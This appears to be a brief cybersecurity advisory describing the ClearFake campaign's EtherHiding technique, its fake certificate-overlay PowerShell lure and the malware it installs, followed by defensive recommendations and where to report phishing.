ClearFake uses a technique called EtherHiding, which uses the blockchain of Binance’s Smart Chain contracts to host a malicious script. This script is injected into compromised websites and loads a second script once a user visits. The secondary script triggers a fake overlay warning to appear, claiming that a root certificate needs to be installed for the website to appear correctly, and includes instructions on how to copy and execute a PowerShell script as a purported solution. If the PowerShell script is executed, the following actions will take place:
- Flushes the DNS cache.
- Clears clipboard content to remove traces of the malicious script.
- Runs a second PowerShell script that downloads Lumma Stealer.
- Lumma Stealer downloads three additional payloads.
- Amadey Loader
- XMRig cryptocurrency miner
- Clipboard Hijacker

- Avoid clicking links and opening attachments in unsolicited emails.
- Confirm requests from senders via contact information obtained from verified and official sources.
- Type official website URLs into browsers manually.
- Facilitate user awareness training to include these types of phishing-based techniques.
- Maintain robust and up-to-date endpoint detection tools on every endpoint.
- Consider leveraging behavior-based detection tools rather than signature-based tools.
- Phishing and other malicious cyber activity can be reported to the FBI's IC3 and the NJCCIC.
